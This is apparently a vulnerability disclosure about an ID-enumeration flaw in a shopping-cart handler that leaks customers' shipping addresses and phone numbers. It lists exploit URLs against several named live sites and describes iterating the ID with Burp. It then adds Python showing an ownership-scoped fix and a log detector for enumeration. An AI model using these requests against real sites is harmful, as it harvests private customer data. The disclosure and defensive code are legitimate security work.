### Brief description:

RT (see title)

### Details:

Prior case:

```
http://wooyun.org/bugs/wooyun-2010-019206
```

Leaking endpoint:

```
/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
```

The ID value is fully under the caller's control; iterating it with Burp turns up a very large number of users' records.

Cases:

```
http://demo.kuaidiantong.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
http://dj.gzdisc.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3
http://www.xxsp.me/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3
http://www.eme.com.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3
http://xn--ehqsq872berelo3bbjl.xn--fiqs8s/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3
http://irentbooks.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3
```

### Proof of vulnerability:

```
http://irentbooks.cn/SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3
```

![01.jpg](https://images.seebug.org/upload/201505/26215515fa895b57d5e939e502236242a3130c69.jpg)

Iterating the ID with Burp to collect phone numbers:

![02.jpg](https://images.seebug.org/upload/201505/26215528be4f5f00fc2a14bfcbcd4ff6b6d8635e.jpg)
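The defect above is a classic insecure direct object reference: the handler trusts the client-supplied `ShippingId` and never checks that the row belongs to the logged-in user. The following is an added example, not the vendor's code; it models the lookup in Python with a constructed in-memory address table (the `ShippingAddress` class, the `ADDRESSES` dict and the sample log lines are all assumptions made for illustration). It shows the unscoped lookup beside an ownership-scoped one, and a small detector that flags a client walking through many distinct `ShippingId` values in the handler's access log, which is the pattern a defender would watch for.

```python
"""Ownership check and enumeration detection for a per-user resource lookup."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit


@dataclass(frozen=True)
class ShippingAddress:
    shipping_id: int
    owner_user_id: int
    name: str
    phone: str


# Constructed sample data standing in for the shipping-address table.
ADDRESSES: Dict[int, ShippingAddress] = {
    1: ShippingAddress(1, owner_user_id=100, name="user-a", phone="13800000001"),
    2: ShippingAddress(2, owner_user_id=101, name="user-b", phone="13800000002"),
    3: ShippingAddress(3, owner_user_id=102, name="user-c", phone="13800000003"),
}


def get_user_shipping_address_vulnerable(shipping_id: int) -> Optional[ShippingAddress]:
    """Looks up by the client-supplied id alone: any caller can read any row."""
    return ADDRESSES.get(shipping_id)


def get_user_shipping_address(session_user_id: Optional[int],
                              shipping_id: int) -> Optional[ShippingAddress]:
    """Requires an authenticated session and scopes the lookup to the caller's own rows.

    A row owned by someone else is answered exactly like a missing row, so the
    response does not even confirm that the id exists.
    """
    if session_user_id is None:
        return None
    addr = ADDRESSES.get(shipping_id)
    if addr is None or addr.owner_user_id != session_user_id:
        return None
    return addr


# Common-log-format line: client ip, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "GET (?P<path>\S+) HTTP/1\.[01]" (?P<status>\d{3})'
)

# Constructed access-log excerpt: 10.0.0.5 walks through ids 1..6, 10.0.0.9 fetches one id.
SAMPLE_LOG = "\n".join(
    [f'10.0.0.5 - - [26/May/2015:21:55:0{i} +0800] '
     f'"GET /SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId={i} HTTP/1.1" 200 310'
     for i in range(1, 7)]
    + ['10.0.0.9 - - [26/May/2015:21:56:00 +0800] '
       '"GET /SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=3 HTTP/1.1" 200 305',
       '10.0.0.9 - - [26/May/2015:21:56:01 +0800] "GET /index.aspx HTTP/1.1" 200 2048']
)


def flag_id_enumeration(log_text: str, threshold: int = 5) -> List[str]:
    """Returns client ips that requested at least `threshold` distinct ShippingId values
    from the GetUserShippingAddress action; a legitimate user touches only a few."""
    seen_ids = defaultdict(set)
    for line in log_text.splitlines():
        match = LOG_LINE.match(line)
        if not match:
            continue
        path = match.group("path")
        params = parse_qs(urlsplit(path).query)
        if params.get("Action") != ["GetUserShippingAddress"]:
            continue
        for sid in params.get("ShippingId", []):
            seen_ids[match.group("ip")].add(sid)
    return sorted(ip for ip, ids in seen_ids.items() if len(ids) >= threshold)


if __name__ == "__main__":
    print("unscoped lookup of id 3:", get_user_shipping_address_vulnerable(3))
    print("user 100 asks for id 3:", get_user_shipping_address(100, 3))
    print("user 102 asks for id 3:", get_user_shipping_address(102, 3))
    print("enumerating clients:", flag_id_enumeration(SAMPLE_LOG))
```

The fix is the `owner_user_id` comparison keyed on the server-side session, not anything in the request; in a real handler that comparison belongs in the query itself (`WHERE ShippingId = ? AND UserId = ?`) so that no code path can forget it. The detector is intentionally coarse; in practice the threshold would be tuned against the site's normal per-user address count.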